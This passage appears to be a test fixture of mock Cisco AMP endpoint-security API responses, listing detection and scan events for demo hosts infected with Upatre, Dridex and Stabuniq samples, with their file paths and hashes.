Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263619","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":627000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263618","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207844921180000,"timestamp":1610704822,"timestamp_nanoseconds":699000000,"date":"2021-01-15T10:00:22+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207844921180170","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659264906658000,"timestamp":1610704820,"timestamp_nanoseconds":460000000,"date":"2021-01-15T10:00:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659264906657801","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1490719361224000800,"timestamp":1610704819,"timestamp_nanoseconds":224000000,"date":"2021-01-15T10:00:19+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"Win.Trojan.Upatre.tht.VRT","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704819,"start_date":"2021-01-15T10:00:19+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331413502427000,"timestamp":1610704818,"timestamp_nanoseconds":57000000,"date":"2021-01-15T10:00:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331409207459841","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825614973673406000,"timestamp":1610704817,"timestamp_nanoseconds":734000000,"date":"2021-01-15T10:00:17+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1185,"scanned_processes":22,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207810561442000,"timestamp":1610704814,"timestamp_nanoseconds":961000000,"date":"2021-01-15T10:00:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207810561441801","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207806266474000,"timestamp":1610704813,"timestamp_nanoseconds":963000000,"date":"2021-01-15T10:00:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207806266474504","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207801971507000,"timestamp":1610704812,"timestamp_nanoseconds":902000000,"date":"2021-01-15T10:00:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207801971507206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.cab","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\4543543.cab","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"},"parent":{"process_id":2348,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207801971507000,"timestamp":1610704812,"timestamp_nanoseconds":777000000,"date":"2021-01-15T10:00:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207801971507207","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"},"parent":{"process_id":2348,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":179000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984840","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":2692,"disposition":"Malicious","file_name":"jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":148000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984839","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":117000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984838","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":1960,"disposition":"Clean","file_name":"IEXPLORE.EXE","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":39000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984837","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":1960,"disposition":"Clean","file_name":"IEXPLORE.EXE","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":7000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659217662017540","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659217662018000,"timestamp":1610704809,"timestamp_nanoseconds":867000000,"date":"2021-01-15T10:00:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659217662017539","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899966001000,"timestamp":1610704801,"timestamp_nanoseconds":966000000,"date":"2021-01-15T10:00:01+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.GenericKD:N.18fd.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704801,"start_date":"2021-01-15T10:00:01+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a"},"parent":{"disposition":"Clean","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395844000300,"timestamp":1610704800,"timestamp_nanoseconds":844000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.Variant:Stabuniq.15nx.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704800,"start_date":"2021-01-15T10:00:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207750431900000,"timestamp":1610704800,"timestamp_nanoseconds":672000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207750431899653","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659179007312000,"timestamp":1610704800,"timestamp_nanoseconds":445000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659179007311874","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and 